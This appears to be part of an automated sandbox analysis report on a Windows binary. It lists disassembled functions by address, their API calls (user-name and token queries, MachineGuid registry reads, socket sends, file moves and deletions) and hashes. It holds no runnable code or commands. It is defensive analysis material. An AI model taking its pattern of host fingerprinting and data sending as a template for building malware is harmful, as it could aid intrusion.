Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

